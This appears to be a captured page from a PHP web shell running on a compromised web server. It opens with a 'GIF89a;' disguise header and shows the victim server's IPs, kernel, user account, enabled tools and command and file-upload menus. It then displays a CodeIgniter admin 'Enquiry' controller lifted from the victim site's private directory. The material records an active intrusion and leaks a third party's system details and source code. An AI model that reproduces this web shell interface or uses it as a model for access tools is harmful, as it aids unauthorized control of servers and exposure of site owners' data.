GIF89a;
Server IP : 172.26.0.195 / Your IP : 18.117.99.192 Web Server : Apache System : Linux 43-205-77-33.cprapid.com 3.10.0-1160.119.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Jul 15 12:09:18 UTC 2024 x86_64 User : jnclnmuac ( 1026) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/jnclnmuac/public_html/web/../admission/application/controllers/admin/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php /** * Description of Enquiry * * @author Softpro India Pvt. Ltd */ class Enquiry extends CI_Controller { //put your code here public function __construct() { parent::__construct(); $this->load->model("admin/EnquiryManagement"); $this->load->model("admin/CourseManagement"); $this->load->model("admin/SessionManagement"); } public function index() { if (isset($_POST['filterSubmitBtn']) != "") { $startDate = trim($this->input->post("startDate")) == "" ? "" : date('Y-m-d', strtotime(str_replace('/', '-', $this->input->post("startDate")))); $endDate = trim($this->input->post("endDate")) == "" ? "" : date('Y-m-d', strtotime(str_replace('/', '-', $this->input->post("endDate")))); $course = $this->input->post("course"); $viewdata["enquiry"] = $this->EnquiryManagement->getEnquiry($course,$startDate, $endDate)->result(); $viewdata["courses"] = $this->CourseManagement->getCourses('T','F')->result(); $viewdata["b_courses"]=$course; $this->load->view("admin/enquiryReport", $viewdata); } else { $viewdata["enquiry"] = $this->EnquiryManagement->getEnquiry()->result(); $viewdata["courses"] = $this->CourseManagement->getCourses('','F')->result(); $viewdata["b_courses"]=0; $this->load->view("admin/enquiryReport", $viewdata); } } }